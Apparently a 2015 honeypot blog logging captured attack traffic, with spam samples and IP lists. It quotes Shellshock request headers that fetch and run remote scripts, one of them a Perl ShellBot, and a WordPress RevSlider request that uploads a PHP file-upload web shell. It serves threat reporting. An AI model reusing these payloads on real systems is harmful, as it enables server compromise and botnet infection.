Montag, 31. August 2015

24x7-allrequestsallowed.com - 146.185.239.100

BEGIN OF HTTP DATA:
2015-08-31 21:33:47
Source IP: 146.185.239.100
Country: RU RiskScore: 1 Malware: []
GET http://24x7-allrequestsallowed.com/?PHPSESSID=mg2adea600143P%5BVJWPHYCF%5DJOU HTTP/1.1
Host: 24x7-allrequestsallowed.com
Accept: */*
Proxy-Connection: Keep-Alive
I find these requests from time to time on my server. When executing the statement by hand it leads to:
curl http://24x7-allrequestsallowed.com/?PHPSESSID=mg2adea600143P%5BVJWPHYCF%5DJOU
Thank you for using our service
So it looks like a check to find servers which can connect to outside servers.

Blacklist StatusBLACKLISTED 3/40
IP Address146.185.239.100 ( Websites Lookup )
Reverse DNSUnknown
ASNAS5577
ASN Ownerroot SA
ISPPetersburg Internet Network ltd.
ContinentEurope
Country CodeFlag (RU) Russian Federation


Perl favicon.icon Download attempt - 211.144.37.41


BEGIN OF HTTP DATA:
2015-08-30 15:49:21
Source IP: 211.144.37.41
Country: CN RiskScore: 10 Malware: []
GET /phppath/cgi_wrapper HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://46.38.251.16/favi
con.icon;curl http://46.38.251.16/favicon.icon;GET http://46.38.251.16/favicon.icon;lwp-download http://46.38.251.16/favicon.i
con;lynx http://46.38.251.16/favicon.icon ");'
Host: 195.169.125.87
Connection: Close
Sadly I get a connection refused by the server, so I am unable to get the specified file.

The source IP
Blacklist StatusBLACKLISTED 13/40
IP Address211.144.37.41 ( Websites Lookup )
Reverse DNSUnknown
ASNAS9811
ASN Ownersrit corp.,beijing.
ISPChina Network Information Center
ContinentAsia

The download IP
Blacklist StatusPOSSIBLY SAFE 0/40
IP Address46.38.251.16 ( Websites Lookup )
Reverse DNSv220100240662590.yourvserver.net
ASNAS197540
ASN Ownernetcup GmbH
ISPnetcup GmbH
ContinentEurope

IBM XForce data for 211.144.37.41
"cats": {
      "Anonymisation Services": 86,
      "Spam": 100
   },
   "geo": {
      "country": "China",
      "countrycode": "CN"
   },

Sonntag, 30. August 2015

The /tmUnblock.cgi attack

I guess you all know about the /tmUnblock.cgi stuff, like discussed on SANS.
Basically this is all about an Linksys related vulnerability.

To clean up my vacation logs :-) I will just post the IPs I have seen

 110.170.205.51
 119.42.100.97
 184.63.49.75
 188.66.67.75
 189.111.224.206
 24.5.88.185
 62.16.232.164
 72.131.123.9
 72.230.248.73
 73.169.21.22
 79.18.235.38
 104.220.0.141
 149.129.69.111
 193.106.234.32
 208.91.177.236
 67.242.13.119
 68.51.170.119
 75.128.82.173
 89.232.118.181

Dienstag, 18. August 2015

Open SMTP relay search - gogo@linwayedm.com.tw

I received the following request on all of my honeypots
BEGIN OF SMTP DATA
177.70.77.242
Country: BR RiskScore: 5.7 Malware: []
uwfdphjcaq@163.com
gogo@linwayedm.com.tw
507
Message-ID: <KUOQLISRUMNOCFSJTHUIL@163.com>
From: "0806" <ltcxjrerz@163.com>
Reply-To: "0806" <darnexinwsq@163.com>
To: gogo@linwayedm.com.tw
Subject: BC_195.169.125.87
Date: Tue, 18 Aug 2015 09:31:21 +0500
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
        boundary="--585038594152556471"
X-Priority: 3
X-MSMail-Priority: Normal

----585038594152556471
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable



----585038594152556471--

End of DataEND OF DATA
Actually, I think this is pretty nice. The attacker searches for open smtp relay servers by sending an email to gogo@linwayedm.com.tw with the subject BC_<IPaddress>. So if you have a SPAM honeypo you maybe want to subscribe :-)


Blacklist StatusBLACKLISTED 5/40
IP Address177.70.77.242 ( Websites Lookup )
Reverse DNS242.77.70.177.mksnet.com.br
ASNUnknown
ASN OwnerUnknown
ISPUnknown
ContinentSouth America

Sonntag, 16. August 2015

Perl DDoS Bot - 222.241.151.149

BEGIN OF HTTP DATA:
2015-08-16 17:09:08
Source IP: 222.241.151.149
Country: CN RiskScore: 1 Malware: []
GET /cgi-bin/php5 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://www.7soles.com/js
/a2.log -O /tmp/a2.log;curl -O /tmp/a2.log http://www.7soles.com/js/a2.log;perl /tmp/a2.log;rm -rf /tmp/a2.log*");'
Host: 109.234.106.8
Connection: Close
The downloadable perl script is identified as
a2.log: Perl.ShellBot-4 FOUND


Blacklist StatusBLACKLISTED 5/40
IP Address222.241.151.149 ( Websites Lookup )
Reverse DNSUnknown
ASNAS4134
ASN OwnerChinanet
ISPChinanet Hunan Province Network
ContinentAsia
Country CodeFlag (CN) China
Latitude / Longitude28.1792 / 113.114
CityChangsha
RegionHunan

Donnerstag, 13. August 2015

fiducia.de branded PayPal SPAM - 136.243.226.145

I received two Paypal SPAM emails

Message-ID: <55CB7A6D.A9A1ACC4@jsany.me>
Date: Wed, 12 Aug 2015 16:55:09 +0200
From: "www.vr.de" <info@jsany.me>
Subject:
 109.234.106.8:25:info@jsany.me:info:"www.vr.de"<info@jsany.me>:nossl::::0:
To: check212016@gmail.com
Content-Type: multipart/mixed;
 boundary="IQEb8Kelq9=_nIw8HiEcGKJxgVtTg4sapX"
MIME-Version: 1.0
X-Mailer: Mozilla 3.04 (WinNT; I)

This is a multi-part message in MIME format
The body of the email sounds like a PayPal email
Hallo lieber PayPal Kunde,
Bitte helfen Sie uns dabei, Ihr Konto wieder in Ordnung zu bringen. Bi=
s dahin haben wir den Zugang zu Ihrem Konto vor=C3=BCbergehend eingesc=
hr=C3=A4nkt.Wo liegt das Problem?Bei Ihrer Kreditkarte sind uns ungew=C3=
=B6hnliche Aktivit=C3=A4ten aufgefallen.Verifizieren Sie sich durch ei=
n Abgleich Ihrer Daten um Ihr Konto wieder Uneingeschr=C3=A4nkt nutzen=
 zu k=C3=B6nnen.Was mache ich jetzt ?

Schritt 1: =C3=96ffnen sie das Formular im Anhang
Schritt 2: Best=C3=A4tigen Sie in Ihrem PayPal-Konto IhreBankdaten
Schritt 3: Verifizieren Sie Ihre Kreditkarte
PayPal Email ID: 6741-9940Viele Gr=C3=BC=C3=9FeIhr Team von PayPal Deu=
tschland522883572783056722171403984794
attached was a document.html file, which looks like the basic login mask for PayPal.

You can find the full message and the decoded document on my Drive Share 
the password is "spam"

IBM Xforce shows a risk of 5.7 and the IP is known for SPAM activity.

Sonntag, 9. August 2015

SSTP establishment - 109.234.39.46

BEGIN OF HTTPS DATA:
2015-08-08 14:25:47
Source IP: 109.234.39.46
Country: RU RiskScore: 1 Malware: []
SSTP_DUPLEX_POST /sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/ HTTP/1.1
Host: 109.234.106.8
SSTPCORRELATIONID: {5a433238-8781-11e3-b2e4-4e6d617021}
Content-Length: 18446744073709551615
This request reached the HTTPS part of my honeypot yesterday. I am posting this more out or curiostity as it is the first time I see this type of requests, A bit googling lead to
https://msdn.microsoft.com/en-us/library/cc247364.aspx and shows that this is part of an Microsoft Secure Socket Tunneling Protocol (SSTP) initialization.

Analysis Date2 seconds ago
Blacklist StatusPOSSIBLY SAFE 0/40
IP Address109.234.39.46 ( Websites Lookup )
Reverse DNSserver6.com
ASNAS35415
ASN OwnerWebaZilla B.V.
ISPMcHost.Ru
ContinentEurope
Country CodeFlag (RU) Russian Federation
Latitude / Longitude55.75 / 37.6166
CityUnknown
RegionUnknown

Samstag, 8. August 2015

Wordpress NULLpOint7r__zemua.php - 192.203.127.198

BEGIN OF HTTP DATA:
2015-08-07 18:24:03
Source IP: 192.203.127.198
Country: US RiskScore: 1 Malware: []
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: johest.de
Content-Length: 654
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=d7711a4c77de4aff8673ca44662115c1

--d7711a4c77de4aff8673ca44662115c1
Content-Disposition: form-data; name="action"

revslider_ajax_action
--d7711a4c77de4aff8673ca44662115c1
Content-Disposition: form-data; name="client_action"

update_plugin
--d7711a4c77de4aff8673ca44662115c1
Content-Disposition: form-data; name="update_file"; filename="NULLpOint7r__zemua.php"
Content-Type: text/html

<?php @set_time_limit(0);@header('null77: pOinter');?><form method='POST' enctype='multipart/form-data'><input type='file' name='f'/><input type='submit' value='up'/></form><?php echo @copy($_FILES['f']['tmp_name'],$_FILES['f']['name'])?'ok':'no';?>
--d7711a4c77de4aff8673ca44662115c1--
received yesterday on my honeypot.
The attack seems to be optimized for Wordpress and targets  /wp-admin/admin-ajax.php directly. As you can see in the code, it tries to upload a php file.

IBM XForce has no record on this ip.

IPVoid instead:
Analysis Date2 seconds ago
Blacklist StatusBLACKLISTED 2/40
IP Address192.203.127.198 ( Websites Lookup )
Reverse DNSUnknown
ASNAS7018
ASN OwnerAT&amp;T Services, Inc.
ISPTuskegee University
ContinentNorth America
Country CodeFlag (US) United States
Latitude / Longitude32.4172 / -85.7191
CityTuskegee Institute
RegionAlabama

Montag, 3. August 2015

SMTP SPAM campaign - hxxp://ppt.cc/

So I have just shut down my smtp server, cause there was a huge income of emails.  All of them related to the same websites

Example:
Received: from 174.128.178.126 by 46.203.227.24; Mon, 03 Aug 2015 06:19:41 -0600
Message-ID: <OBQGDHMJCXMWTMUCUVHKKO@163.com>
From: "<A7>䯥<A4><CD>" <rsosmpk@163.com>
Reply-To: "<A7>䬶<A4>ͪ<BA><A8>k<A5><U+0373>̷s<A9><DB>" <iceaegrnltj@163.com>
To: QUOTED
Subject: <A7>䯥<A4>ͪ<BA><A4>k<A4>H
Date: Mon, 03 Aug 2015 17:19:41 +0500
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
        boundary="--0901866075153714"
X-Priority: 3
X-MSMail-Priority: Normal

----0901866075153714
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

        <span style=3D"font-size:36px;"><span style=3D"color:#b22222;"><span styl=
e=3D"font-size: 28px;">=B7s=B7s=A4H=C3=FE=AA=BA=A7=DA=AD=CC=B4N=ADn=BA=C9=B1=
=A1=A8=C9=A8=FC=B3t=AD=B9=B7R=B1=A1=AA=BA=A7=D6=B7P</span></span></span></=
p>
<p>

<p>
        <span style=3D"font-size:48px;"><b><a href=3D"hxxp://ppt.cc/II6He"><font =
color=3D"blue" face=3D"Arial">http://ppt.cc/II6He</font></a></b></span></p=
>
 The a href always points to the same domain
hxxp://ppt.cc/
and redirects to
 www.okbank.com.tw
I have found 55 unique IP addresses involved in this campaign
119.87.120.192
123.247.168.120
123.247.198.208
14.24.45.95
14.25.165.167
14.26.175.28
173.9.87.247
176.37.98.14
177.2.108.58
179.111.208.144
182.205.109.78
183.40.236.56
183.41.212.203
183.42.216.12
183.42.38.174
183.43.231.35
183.43.61.210
184.149.184.13
189.8.94.174
190.151.23.19
190.151.32.18
191.251.194.156
198.199.85.188
200.195.135.195
201.247.149.77
202.29.215.100
202.62.10.210
204.186.103.3
23.254.201.124
27.128.76.129
27.149.31.141
36.42.135.117
36.43.162.102
38.83.102.106
41.231.85.184
45.55.30.180
45.79.152.176
46.203.227.24
46.246.186.60
54.251.115.56
84.61.8.22
94.103.80.52
94.125.88.10
 

Samstag, 1. August 2015

HTTP/2 revisited

As you may know, I published a simple blog post about "HTTP/2 PUSHing malicious content". This lead to some discussions and more investigation and even more questions.

Let me describe the whole stuff once again.
  1. There is this pretty and fancy new protocol. It replaces HTTP 1.1 and 1.0 and will be the next standard. Actually it is officially the version 2.0 of the HTTP standard. This new protocol is so new and fancy that my tools (I tried, Wireshark, Burp Suit and OWASP ZAP) are not able to tell me anything about the traffic. It is shown as TCP only. The whole communication between server and client is framed based and uses TLS. So instead of a nice text header like
    HTTP/1.x 200 OK
    Transfer-Encoding: chunked
    Date: Sat, 28 Nov 2009 04:36:25 GMT
    Server: LiteSpeed
    Connection: close
    X-Powered-By: W3 Total Cache/0.8
    You will see a frame. One or more binary packages holding this information.
    The body is just the same idea, it will be frame and binary based.Even the frames can be split. So the the server responses the way it makes sense and multiplexes the traffic.
     
  2. One new feature is SERVER PUSH. The idea is that the server can send you a file for your browser to cache it. Maybe you need it later. As an example, let say I have a website with a lot of animal pictures. Now I have one picture of a cat. The cat is adorable and I am pretty sure that everybody visiting my page will stop at that picture and take a look. Well, so now I am clever, I just push you the file directly at the beginning. Right from the start you have it. When you than klick on the picture your browser can show it instantly.  Thats a cool feature.

    So now you ask, what type of files can I push? Well, anything. I tried the EICAR test signature. Worked. Limitation, it worked with the nghttp2 tools.  For Firefox I do not know. Cause (1) I am not able to see the traffic.
  3. So, lets combine (1) and (2).  Worst scenario, I can push you whatever I want. Your Browser will accept any package and store it into the cache. Thats step one of many bad things which can happen. 
Now call me crazy or call me paranoid.
I believe that this is a thing worth talking about. I am open for discussion, just send me a mail or a message. My Google+ profile is linked on the right.